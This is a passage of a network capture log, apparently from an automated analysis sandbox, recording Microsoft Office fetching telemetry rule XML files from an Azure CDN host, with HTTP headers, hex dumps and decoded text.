                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  52192.168.2.44984513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:20 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:20 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB046B576"
                                                                                                                                                                                  x-ms-request-id: a7985a29-001e-0046-374c-3cda4b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134720Z-15b8b599d88wn9hhhC1TEBry0g000000031000000000bvvb
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:20 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  53192.168.2.44984413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:20 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:20 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 404
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                                                                  ETag: "0x8DC582B95C61A3C"
                                                                                                                                                                                  x-ms-request-id: ae8c6dce-101e-008d-4280-3b92e5000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134720Z-174c587ffdftv9hphC1TEBm29w00000002xg00000000cakb
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:20 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  54192.168.2.44984613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:20 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:20 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 400
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB2D62837"
                                                                                                                                                                                  x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134720Z-174c587ffdf6b487hC1TEBydsn00000003100000000027q5
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:20 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  55192.168.2.44984713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:20 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:20 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 479
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB7D702D0"
                                                                                                                                                                                  x-ms-request-id: 171ae584-101e-005a-6763-3b882b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134720Z-178bfbc474bgvl54hC1NYCsfuw00000004f000000000d271
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:20 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  56192.168.2.44984913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:22 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:22 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 475
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB2BE84FD"
                                                                                                                                                                                  x-ms-request-id: 76e95f1f-101e-0034-7059-3b96ff000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134722Z-178bfbc474bwlrhlhC1NYCy3kg00000004gg00000000bdg5
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:22 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  57192.168.2.44985013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:22 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:22 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 448
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB389F49B"
                                                                                                                                                                                  x-ms-request-id: 98e24ef8-f01e-0052-0940-3c9224000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134722Z-15b8b599d88hd9g7hC1TEBp75c000000032g000000001x3s
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:22 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  58192.168.2.44984813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:22 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:22 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 425
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                  ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                  x-ms-request-id: 62f36519-501e-0016-468c-3a181b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134722Z-174c587ffdf9xbcchC1TEBxkz400000002rg00000000p8z8
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:22 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  59192.168.2.44985113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:22 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:23 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:22 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 491
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582B98B88612"
                                                                                                                                                                                  x-ms-request-id: 89d933d2-101e-0028-046e-3c8f64000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134722Z-174c587ffdftv9hphC1TEBm29w00000002u000000000ndt6
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:23 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  60192.168.2.44985213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:22 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:23 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:22 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 416
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                                                                                  ETag: "0x8DC582BAEA4B445"
                                                                                                                                                                                  x-ms-request-id: f9d2b1a4-b01e-003d-337e-3bd32c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134722Z-174c587ffdfdwxdvhC1TEB1c4n00000002wg00000000epc2
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:23 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  61192.168.2.44985313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:24 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:24 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 479
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                  ETag: "0x8DC582B989EE75B"
                                                                                                                                                                                  x-ms-request-id: f47ed088-401e-0029-7f4d-3c9b43000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134724Z-15b8b599d889gj5whC1TEBfyk000000002vg000000007kq5
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
